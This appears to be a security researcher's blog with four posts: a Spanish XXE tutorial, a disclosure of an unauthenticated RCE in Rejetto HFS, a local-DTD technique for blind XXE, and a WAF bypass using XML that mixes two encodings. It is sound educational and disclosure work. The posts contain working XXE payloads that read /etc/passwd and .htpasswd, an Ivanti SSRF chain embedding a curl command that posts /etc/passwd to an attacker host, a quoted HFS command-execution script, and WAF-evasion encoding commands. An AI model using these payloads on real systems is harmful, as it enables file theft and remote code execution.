Arseniy Sharoglazov

¿Qué es XXE y cómo funciona?

Arseniy Sharoglazov — Fri, 31 May 2024 12:52:59 +0000

XXE es una vulnerabilidad en el procesamiento de XML, un texto que está marcado según reglas específicas. Si una aplicación lo procesa incorrectamente, se pueden realizar ataques contra ella.

Al principio de cualquier documento XML, se puede especificar un doctype. Este es un encabezado de texto en el que se declara qué tipo de documento es y qué hay dentro de este. A veces, en el doctype, se permiten construcciones peligrosas, como entidades externas.

XXE significa XML eXternal Entity, que se traduce como entidad externa de XML.

En este artículo, se aborda el enfoque clásico sobre la vulnerabilidad. Primero hablamos sobre las partes del XML:

Etiquetas. De qué se compone un documento
Documento. Cómo construir un XML a partir de etiquetas
Declaración XML. Declaramos el XML
Doctype. Describimos la estructura del documento

Luego, hablamos sobre las entidades: entidades, entidades externas, entidades parametrizadas, referencias a caracteres.

Al final, aprendemos a atacar:

Lectura de archivos. Descubrimos contraseñas
Falsificación de solicitudes. Atacamos demonios y la red local
Cómo verificar. Saber si el servidor es vulnerable
Qué sigue. Problemas de la vulnerabilidad

¡Vamos a desglosarlo!

Etiquetas

La etiqueta es una unidad compositiva del documento. Si el documento es una casa, entonces la etiqueta es un ladrillo.

La etiqueta es una marca entre llaves: <abc>. Hay tres tipos de etiquetas: inicio: <abc>, cierre: </abc>, vacía: <abc/>.

Entre la etiqueta de inicio y la de cierre se almacena información:

<abc>XXE</abc>

Esto se llama un elemento. Una etiqueta vacía también es un elemento.

Todas las etiquetas pueden tener atributos. El valor del atributo puede estar entre comillas dobles o simples:

<text lang="en-US">XXE</text><break size='20'/>

En los atributos, se escriben pequeñas opciones: idioma, número de orden. El atributo indica: pertenezco a lo que está dentro de la etiqueta.

Entre las etiquetas puede haber comentarios:

<!-- XXE --><abc lang="en-US" page='1'>XXE <!-- XXE --> XXE </abc>

Los comentarios son para los desarrolladores. Las aplicaciones los omiten.

Instrucciones de procesamiento

En XML, se permite usar instrucciones de procesamiento:

<abc/><?inst TEXT?><abc/>

Normalmente, las aplicaciones percibirán estas instrucciones como comentarios. No llame “xml” a la instrucción, ya que está reservado para la declaración XML.

Documento

Si le pasas a una aplicación un conjunto de etiquetas, no lo entenderá. Las aplicaciones solo aceptan documentos.

Un documento es un solo elemento que, a su vez, puede tener otros elementos dentro:

<!-- XXE -->
<page>
    <descr lang="en-US">XXE</descr>
    <xyz/>
</page>

Las etiquetas en un documento se abren en el mismo orden en que se cierran. El documento más corto consiste en una etiqueta vacía.

Declaración XML

La declaración es el primer encabezado de XML. Indica qué tipo de documento es y en qué codificación está:

<?xml version="1.0" encoding="UTF-8" standalone="no"?>

La declaración siempre está al principio: indica cómo leer el doctype y el cuerpo del documento.

La declaración tiene tres atributos:

version: Versión de XML. Se escribe 1.0.
encoding: Codificación. Generalmente UTF-8.
standalone: Autonomía. En un XML autónomo, las entidades externas no funcionan. Se escribe no.

No se pueden cambiar de lugar los atributos. La codificación y la autonomía son opcionales.

La declaración puede ayudar a distinguir entre inyección XML y XXE.

Funcionará	No Funcionará
`<?xml version="1.0"?> <page> Text </page>`	`<page> <?xml version="1.0"?> Text </page>`

Siempre recomiendo escribir la declaración. Primero, te aseguras de que controlas el inicio del documento. Segundo, según la especificación, no puedes definir un doctype sin la declaración.

Doctype

El doctype es el segundo encabezado de XML. Es una construcción opcional en la que se describe la estructura del documento.

<?xml version="1.0"?>
<!DOCTYPE page [
    <!ELEMENT page (descr)*>
    <!ELEMENT descr ANY>
    <!ATTLIST descr
        lang CDATA #REQUIRED>
]>
<page>
    <descr lang="en-US">Text</descr>
</page>

El doctype mínimo nombra el elemento raíz:

<!DOCTYPE page>

El doctype es necesario para describir la estructura del documento. Esto se hace en otro lenguaje llamado DTD.

No te preocupes. No es necesario conocer DTD a fondo. Basta con saber cómo definir entidades.

Entidades

Una entidad es un texto que se puede definir en DTD y luego usar en el documento mediante una referencia:

<?xml version="1.0"?>
<!DOCTYPE page [
    <!ENTITY english "en">
    <!ENTITY english_full "&english;-US">
]>
<page>
    <descr lang="&english_full;">Text</descr>
</page>

Estas entidades se llaman generales. Se usan cuando algún texto o símbolo especial se repite varias veces.

Las entidades generales se expandirán al leer el documento, no en el doctype. Pueden incluir elementos, pero no pueden modificar la estructura externa. También pueden ser anidadas.

Por defecto, ya tienes cinco entidades:

Entidad	Lo que verá la aplicación
<	<
>	>
"	"
'	'
&	&

Son necesarias para no dañar la estructura cuando necesitas usar caracteres especiales. Además, ayudan a proteger contra inyecciones XML.

Entidades externas

Las entidades externas son entidades cuyo texto se obtiene mediante un enlace:

<?xml version="1.0"?>
<!DOCTYPE page [
    <!ENTITY info SYSTEM "http://api.wolframalpha.com/v2/result?appid=[TOKEN]&input=the+next+solar+eclipse">
]>
<page>
    <descr lang="en-US">The next solar eclipse occurs on &info;.</descr>
</page>

En este ejemplo, el parser seguirá el enlace, insertará los datos y luego entregará el texto a la aplicación.

El parser no siempre mira las entidades externas. Si soporta evaluaciones perezosas, solo accederá al enlace cuando necesite el texto del elemento. Los elementos que la aplicación omite no serán leídos por dicho parser.

Hay dos maneras de conectar las entidades: a través de SYSTEM y a través de PUBLIC.

<!ENTITY name SYSTEM "URI">
<!ENTITY name PUBLIC "Public-ID" "URI">

Si la entidad está conectada a través de PUBLIC, el parser primero la buscará en el almacenamiento por su Public-ID y, si no la encuentra allí, la obtendrá mediante el enlace.

Nota avanzada: El uso del almacenamiento y Public-ID fue una forma secreta de explotar XXE, similar a mi publicación de 2018: Exploiting XXE with local DTD files. No estoy seguro si este método fue publicado posteriormente.

Un URI puede ser no solo un recurso en Internet, sino también una ruta a un archivo en el sistema operativo.

Las entidades externas están prohibidas en los atributos:

<a attr="&ent;">&ent;</a>

Dentro de los identificadores SYSTEM y PUBLIC no se realiza ningún procesamiento de los caracteres especiales en el URI, como &, %; puedes insertarlo tal como está.

Entidades parametrizadas

Las entidades parametrizadas son entidades especiales para su uso dentro del DTD:

<?xml version="1.0"?>
<!DOCTYPE page [
    <!ENTITY % languages '<!ENTITY english "en-US">'>
    %languages;
]>
<page>
    <descr lang="&english;">Text</descr>
</page>

Se diferencian de las entidades normales por el signo de porcentaje. No están relacionadas con las entidades normales; incluso sus espacios de nombres son diferentes.

Las entidades parametrizadas también pueden ser externas:

…
<!DOCTYPE page [
    <!ENTITY % languages SYSTEM 'languages.dtd'>
    %languages;
]>
…

A diferencia de las entidades generales, las entidades parametrizadas a menudo pueden alterar la estructura de la DTD.

Doctype externo

Otra forma de incluir un DTD es mediante un doctype externo. Se puede utilizar tanto con SYSTEM como con PUBLIC.

<?xml version="1.0"?>
<!DOCTYPE page SYSTEM 'languages.dtd'>
<page>XXE</page>

El doctype externo se puede combinar con un DTD interno:

<?xml version="1.0"?>
<!DOCTYPE page SYSTEM 'languages.dtd' [
    <!ENTITY english "en">
]>
<page>XXE</page>

Referencias a caracteres

Las referencias a los caracteres son casi entidades. Se utilizan para definir caracteres mediante el código Unicode:

Character	Formato DEC	Formato HEX
%	%	%
&	&	&
§	§	§
‰	‰	‰

Las referencias a caracteres son reconocidas tanto en las entidades en el doctype como en el cuerpo del documento:

Antes de leer

Después de leer

<!DOCTYPE abc [
    <!ENTITY permille_1 "&#8240;">
    <!ENTITY permille_2 "&#38;#8240;">
    <!ENTITY permille_3 "&#38;#38;#8240;">
]>
<abc>
    A: &#8240;
    B: &permille_1;
    C: &permille_2;
    D: &permille_3;
</abc>






<abc>
    A: ‰
    B: ‰
    C: ‰
    D: &#8240;
</abc>

En la primera línea, la referencia se expandirá en el elemento. En la segunda línea, la referencia se expandirá en el doctype. En la tercera, primero en el doctype y luego otra vez en el elemento

Lectura de archivos

Ya sabes cómo construir documentos, escribir doctypes y definir entidades. Ahora lo más importante: cómo atacar.

Arbitrary File Read es un ataque en el que puedes leer archivos en el servidor. Cuando indicas la ruta a un archivo local en el URI en de la entidad externa, el parser lo incluirá en el documento y la aplicación puede mostrar su contenido:

<?xml version="1.0"?>
<!DOCTYPE page [
    <!ENTITY file SYSTEM "/var/www/monitoring/.htpasswd">
]>
<page>
    &file;
</page>

Descubrir las rutas a los archivos es complicado. Hay que adivinarlas, pero existen trucos:

A veces funciona el listado de directorios

<!ENTITY file SYSTEM "/home">

A veces funciona el ataque de enumeración de directorios

<!ENTITY file SYSTEM "/etc/abc/../../etc/passwd">

Los archivos se pueden leer mediante rutas relativas

<!ENTITY file1 SYSTEM "./test.txt">
<!ENTITY file2 SYSTEM "file:./test.txt">

El camino relativo se determina desde el directorio de trabajo de la aplicación si la entidad externa está especificada en el DTD interno, y en relación con el URI si está especificada en el DTD externo.

Si solo controlas el DTD externo, en algunos casos puedes utilizar el protocolo file: para acceder a rutas relativas en relación con el directorio de la aplicación. Esto es especialmente relevante para Java.

Falsificación de solicitudes

SSRF es un ataque en el que envías solicitudes desde la aplicación a varios servicios, internos o externos, o a externos cuyo acceso está bloqueado por el firewall.

El ejemplo más conocido de explotación SSRF a través de XXE hasta la fecha probablemente sea la combinación de CVE-2024-21887 y CVE-2024-22024 en Ivanti Connect Secure:

<?xml version="1.0"?>
<!DOCTYPE root [
    <!ENTITY % xxe SYSTEM "http://127.0.0.1:8090/api/v1/license/keys-status/%3bcurl%20-X%20POST%20-d%20%40%2fetc%2fpasswd%20http%3a%2f%2f8attacker.com%3b">
    %xxe;
]>
<root></root>

Aunque este no es el método original de explotar las vulnerabilidades, es un claro ejemplo de cómo encadenar XXE y SSRF en el software más reciente.

Cómo verificar XXE

Para la prueba, es mejor encontrar un documento preparado que acepte la aplicación. Puede ser interceptado o exportado.

A continuación, es importante enviarlo al servidor en la forma en que este espera recibirlo. Por ejemplo, el servidor puede verificar el encabezado Content-Type y permitir solo valores text/xml o application/xml.

Al final, en el documento se menciona una entidad externa de todas formas posibles e intenta realizar un SSRF al host del atacante.

Método 1

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!DOCTYPE message [
    <!ENTITY % test SYSTEM "http://testxxe.attacker.com/">
%test;
]>
<message …>
    …
</message>

Método 2

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!DOCTYPE message SYSTEM "http://testxxe.attacker.com/">
<message …>
    …
</message>

Método 3

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!DOCTYPE message [
    <!ENTITY test SYSTEM "http://testxxe.attacker.com/">
]>
<message document="1.0">
    <some_structures>
        …
    </some_structures>
     <some_structures>
        <column name="test">&test;</column>
    </some_structures>
</message>

Si la aplicación es vulnerable, tu servidor DNS debería recibir la solicitud correspondiente o deberías notar una pausa en la respuesta.

Al verificar a través de DNS, hay una mayor probabilidad de obtener la respuesta.

Siempre se puede usar una construcción PUBLIC en lugar de SYSTEM. Una de ellas puede funcionar mientras que la otra no.

Si los tres métodos fallan, no se puede afirmar con certeza que no haya una vulnerabilidad. Presta atención a señales indirectas: soporte de la declaración XML, funcionamiento de construcciones DTD seguras, errores en la página y tiempo de respuesta de la solicitud.

Si crees que las respuestas al exterior están bloqueadas por el firewall y el DNS no está disponible, también puedes realizar pruebas booleanas específicas del sistema operativo:

Linux (Correcto DTD)

<!ENTITY % test SYSTEM "file:///sys/devices/system/cpu/uevent">
%test;

Linux (Incorrecto DTD)

<!ENTITY % test SYSTEM "file:///bin/sh">
%test;

Windows 7+ (Correcto DTD)

<!ENTITY % test SYSTEM "file:///C:\Windows\System32\wbem\en-US\p2p-mesh.mfl">
%test;

Windows 7+ (Incorrecto DTD)

<!ENTITY % test SYSTEM "file:///C:\Windows\notepad.exe">
%test;

A veces, no vale la pena gastar tiempo: por ejemplo, el protocolo SOAP casi nunca es vulnerable. Pero si dentro de SOAP notas XML personalizado en uno de los campos, dedica tiempo a examinarlo, ya que también podría haber XXE.

¿Qué sigue?

La XXE tiene varios problemas.

No se pueden leer archivos binarios
Si el parser encuentra caracteres que no están en la codificación, el procesamiento se detendrá. La codificación predeterminada es UTF-8, pero se puede cambiar en el encabezado XML.

No se pueden mostrar archivos que dañen la estructura
En algunos archivos que intente leer, encontrará caracteres especiales de XML:

[users]
name = admin
username = admin <admin@localhost>
password = 6x&IBGK

La inclusión de estos caracteres dañará el documento y detendrá el procesamiento.

Las aplicaciones rara vez devuelven datos en la página
Puedes obtener una respuesta por DNS, pero la página estará vacía. Aquí, los ataques clásicos no serán efectivos.

Estos problemas hacen que la vulnerabilidad XXE sea muy compleja. Resolverlos se llama explotación de XXE.

Recomiendo las siguientes fuentes para entender qué se puede hacer con XXE en casos difíciles:

¡Complementa este listado en los comentarios de la página X de este artículo y no te decepciones con XXE!

Rejetto HTTP File Server 2.3m Unauthenticated RCE

Arseniy Sharoglazov — Fri, 24 May 2024 22:51:56 +0000

I just decided to share an interesting Unauthenticated RCE and the story behind it!

Rejetto HTTP File Server

During a red team assessment, I stumbled upon a mysterious web app:

Here’s what I encountered on the 80/tcp port

This web application was confirmed to be Rejetto HFS, a once-popular Windows web server first released in August 2002.

A quick online search revealed that version 2.3m has no known vulnerabilities. However, I was surprised to find that older versions had numerous RCEs!

import socket

url = raw_input("Enter URL : ")
try:
      while True:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((url, 80))
            cmd = raw_input("Enter command (E.g. calc) or press Ctrl+C to exit : ")
            req = "GET /?{.exec|"+cmd+".}"
            req += " HTTP/1.1\r\n\r\n"
            sock.send(req)
            sock.close()
            print "Done!"
except KeyboardInterrupt:
      print "Bye!"

This code for exploiting RCE in HTTP File Server 2.1.2 was found on ExploitDB

What is “{.exec”? Is this one of the earliest known template injections? The software appeared too old for such attacks, and the platform, Windows, is also unconventional.

Confused, I decided to download and analyze what was going on. I obtained an exe file from the official website and found the source code on GitHub, which turned out to be written in Delphi.

Unauthenticated Remote Code Execution

When I saw the code on both GitHub and IDA Pro, I was amazed. Indeed, HFS has its own template parser, making it one of the oldest among its kind.

Furthermore, it took me less than 10 minutes to bypass all restrictions and execute my code on version 2.3m, which was marked as the latest and stable!

I decided to publish the screenshot in a redacted version

It was a bit challenging, but in the end, I created a POC that not only executes the code, but also returns the output and hides itself from log files (via a null byte). Note that the value of the Host header was also tampered with, which is crucial for the injection.

Reporting

I was sad to learn that Rejetto HTTP File Server 2.x is now obsolete and no longer supported. After a discussion with Massimo Melina, we concluded that we should recommend all users to update to HFS 3.

Timeline

18/08/2023 — Reported to the vendor
21/08/2023 — Reply received
24/05/2024 — Vendor informed about disclosure
24/05/2024 — Reply received
25/05/2024 — Article released
25/05/2024 — CVE Request 1671764
31/05/2024 — MITRE assigned CVE-2024-23692
06/06/2024 — Stephen Fewer published the metasploit module and the attackerkb article

Exploiting XXE with local DTD files

Arseniy Sharoglazov — Thu, 13 Dec 2018 18:00:00 +0000

This little technique can force your blind XXE to output anything you want!

Why do we have trouble exploiting XXE in 2k18?

Imagine you have an XXE. External entities are supported, but the server’s response is always empty. In this case you have two options: error-based and out-of-band exploitation.

Let’s consider this error-based example:

Request	Response
`<?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd"> %ext; ]> <message></message>`	java.io.FileNotFoundException: /nonexistent/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/usr/bin/nologin daemon:x:2:2:daemon:/:/usr/bin/nologin (No such file or directory)

Contents of ext.dtd

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

See? You are using an external server for delivering the DTD payload. What can you do if there is a firewall between you and the target server? Nothing!

What if we just put an external DTD content directly to the DOCTYPE? If we do this, some errors should always appear:

Request	Response
`<?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ]> <message></message>`	Internal Error: SAX Parser Error. Detail: The parameter entity reference “%file;” cannot occur within markup in the internal subset of the DTD.

External DTDs allow us to include one entity inside another one, but it’s prohibited in the internal DTD syntax.

What can we do inside an internal DTD?

To use external DTD syntax in the internal DTD subset, you can bruteforce a local DTD file on the target host and redefine some parameter-entity references inside it:

Request

Response

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd">

    <!ENTITY % condition 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>

    %local_dtd;
]>
<message>any text</message>

java.io.FileNotFoundException: /nonexistent/
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/usr/bin/nologin
daemon:x:2:2:daemon:/:/usr/bin/nologin

(No such file or directory)

Contents of sip-app_1_0.dtd

…
<!ENTITY % condition "and | or | not | equal | contains | exists | subdomain-of">
<!ELEMENT pattern (%condition;)>
…

This works because all XML entities are constant. If you define two entities with the same name, only the first one will be used.

How can we find a local DTD file?

Nothing is easier than enumerating files and directories. Below are a few more examples of the successful application of this trick:

Custom Linux System

<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa 'Your DTD code'>
%local_dtd;

Custom Windows System

<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>Your DTD code<!ENTITY test "test"'>
%local_dtd;

I would like to say thank you to Mikhail Klyuchnikov from Positive Technologies for sharing this path of always-existing Windows DTD file.

Cisco WebEx

<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd">
<!ENTITY % url.attribute.set '>Your DTD code<!ENTITY test "test"'>
%local_dtd;

Citrix XenMobile Server

<!ENTITY % local_dtd SYSTEM "jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd">
<!ENTITY % Body '>Your DTD code<!ENTITY test "test"'>
%local_dtd;

Any Web Application on IBM WebSphere Application Server

<!ENTITY % local_dtd SYSTEM "./../../properties/schemas/j2ee/XMLSchema.dtd">
<!ENTITY % xs-datatypes 'Your DTD code'>
<!ENTITY % simpleType "a">
<!ENTITY % restriction "b">
<!ENTITY % boolean "(c)">
<!ENTITY % URIref "CDATA">
<!ENTITY % XPathExpr "CDATA">
<!ENTITY % QName "NMTOKEN">
<!ENTITY % NCName "NMTOKEN">
<!ENTITY % nonNegativeInteger "NMTOKEN">
%local_dtd;

Timeline

01/01/2016 — Discovering the technique
12/12/2018 — Writing the article :D
13/12/2018 — Full disclosure

Evil XML with Two Encodings

Arseniy Sharoglazov — Sun, 04 Feb 2018 06:00:00 +0000

WAFs see a white noise instead of the document!

In this article, I explain how XML parsers decode XML from different encodings and how to bypass WAFs by using some of the XML decoding features.

What encodings are supported in XML

According to the specification, all XML parsers must be capable of reading documents in at least two encodings: UTF-8 and UTF-16. Many parsers support more encodings, but these should always work.

Extensible Markup Language (XML) 1.0 (Fifth Edition)

Both UTF-8 and UTF-16 are used for writing characters from the Unicode table.

The difference between UTF-8 and UTF-16 is in the way they encode the Unicode characters to a binary code.

UTF-8

In UTF-8, a character is encoded as a sequence of one to four bytes.

The binary code of an encoded character is defined by this template:

Number of bytes	Significant bits	Binary code
1	7	0xxxxxxx
2	11	110xxxxx 10xxxxxx
3	16	1110xxxx 10xxxxxx 10xxxxxx
4	21	11110xxx 10xxxxxx 10xxxxxx 10xxxxxx

An overlong encoding is prohibited, so only the shortest method is correct.

UTF-16

In UTF-16, a character is encoded as a sequence of two or four bytes.

The binary code is defined by the following template:

Number of bytes	Significant bits	Binary code
2	16	xxxxxxxx xxxxxxxx
4 *	20	110110xx xxxxxxxx 110111xx xxxxxxxx

* 0x00010000 is subtracted from a character code before encoding it

If a symbol has been written by four bytes, its binary code is called a surrogate pair. A surrogate pair is a combination of two common symbols from the reserved range: U+D800 to U+DFFF. One half of a surrogate pair is not valid.

UTF-16: BE and LE encodings

There are two types of UTF-16: UTF-16BE and UTF-16LE (big-endian / little-endian). They have a different order of bytes.

Big-endian is a “natural” order of bytes like in the Arabic numerals. Little-endian is an inverse order of bytes. It’s used in x86-64 and is more common for computers.

Some examples of encoding symbols in UTF-16BE and UTF-16LE:

Encoding	Symbol	Binary code
UTF-16BE	U+003F	00000000 00111111
UTF-16LE	U+003F	00111111 00000000
UTF-16BE *	U+1D6E5	11011000 00110101 11011110 11100101
UTF-16LE *	U+1D6E5	00110101 11011000 11100101 11011110

* In a surrogate pair, each of the “characters” is inverted on its own. This is designed for backward compatibility with Unicode 1.0, where all symbols were encoded using two bytes only.

How do parsers detect encoding

According to the XML specification, parsers detect encoding in four ways:

By external information about encoding

Some network protocols have a special field that indicates the encoding:

Specifying the encoding of the document in the WebDav protocol

Most frequently these are protocols that built by the MIME standard. For example it’s SMTP, HTTP, and WebDav.

By reading Byte Order Mark (BOM)

The Byte Order Mark (BOM) is a special character with the U+FEFF code.

If a parser finds a BOM at the beginning of the document, then the encoding is determined by the binary code of the BOM.

Encoding	BOM	Example
UTF-8	EF BB BF	EF BB BF 3C 3F 78 6D 6C	...<?xml
UTF-16BE	FE FF	FE FF 00 3C 00 3F 00 78 00 6D 00 6C	...<.?.x.m.l
UTF-16LE	FF FE	FF FE 3C 00 3F 00 78 00 6D 00 6C 00	..<.?.x.m.l.

By first symbols of document

The specification allows parsers to determine encoding by the first bytes:

Encoding	Document
UTF-8 ISO 646 ASCII	3C 3F 78 6D	<?xm
UTF-16BE	00 3C 00 3F	.<.?
UTF-16LE	3C 00 3F 00	<.?.

But, this only works for documents that start with an XML declaration.

By XML declaration

The encoding can be written in the XML declaration:

<?xml version="1.0" encoding="UTF-8"?>

An XML declaration is a special string that can be written at the beginning of the document. A parser understands the version of the document’s standard by this string.

<?xml version="1.0" encoding="ISO-8859-1" ?>
<très>là</très>

Document in the ISO-8859-1 encoding

Obviously, in order to read the declaration, parsers have to know the encoding in which the declaration was written. But, the XML declaration is useful for clarification between ASCII-compatible encodings.

Known Technique: WAF bypass by using UTF-16

The most common way to bypass a WAF by using XML encodings is to encode the XML to a non-compatible with ASCII encoding, and hope that the WAF will fail to understand it.

For example, this technique worked in the PHDays WAF Bypass contest in 2016.

POST / HTTP/1.1
Host: d3rr0r1m.waf-bypass.phdays.com
Connection: close
Content-Type: text/xml
User-Agent: Mozilla/5.0
Content-Length: 149

<?xml version="1.0"?>
<!DOCTYPE root [
    <!ENTITY % xxe SYSTEM "http://evilhost.com/waf.dtd">
    %xxe;
]>
<root>
    <method>test</method>
</root>

Request that exploited XXE from the contest

One of the solutions to this task was to encode the XML from the POST’s body into UTF-16BE without a BOM:

cat original.xml | iconv -f UTF-8 -t UTF-16BE > payload.xml

In this document, the organizer’s WAF didn’t see anything dangerous and did process the request.

New Technique: WAF Bypass by using Two Encodings

There is a way to confuse a WAF by encoding XML using two encodings simultaneously.

When a parser reads encoding from the XML declaration, it immediately switches to it. Including the case when the new encoding isn’t compatible with the encoding in which the XML declaration was written.

I didn’t find a WAF that supports parsing such multi-encoded documents.

‎Xerces2 Java Parser

The XML-declaration is in ASCII, the root element is in UTF-16BE:

00000000	3C3F 786D 6C20 7665 7273 696F 6E3D 2231	<?xml version="1
00000010	2E30 2220 656E 636F 6469 6E67 3D22 5554	.0" encoding="UT
00000020	462D 3136 4245 223F 3E00 3C00 6100 3E00	F-16BE"?>.<.a.>.
00000030	3100 3300 3300 3700 3C00 2F00 6100 3E	1.3.3.7.<./.a.>

Commands for encoding your XML:

echo -n '<?xml version="1.0" encoding="UTF-16BE"?>' > payload.xml
echo -n '<a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml

libxml2

libxml2 switches the encoding immediately after it reads it from the “attribute”. Therefore, we need to change the encoding before closing the declaration:

00000000	3C3F 786D 6C20 7665 7273 696F 6E3D 2231	<?xml version="1
00000010	2E30 2220 656E 636F 6469 6E67 3D22 5554	.0" encoding="UT
00000020	462D 3136 4245 2200 3F00 3E00 3C00 6100	F-16BE".?.>.<.a.
00000030	3E00 3100 3300 3300 3700 3C00 2F00 6100	>.1.3.3.7.<./.a.
00000040	3E	>

Commands for encoding your XML:

echo -n '<?xml version="1.0" encoding="UTF-16BE"' > payload.xml
echo -n '?><a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml

Afterword

The technique was discovered on September 5th, 2017. The first publication of this material was on Habr (in Russian) on October 13th, 2017.

Nicolas Grégoire released on Twitter a similar technique for ‎Xerces2 and UTF-7 on October 12th, 2017, and that’s why I published this article on Habr in less than 24 hours later.

In addition to UTF-7, UTF-8, and UTF-16, you can use many different encodings, but you should take into account your parser’s capabilities.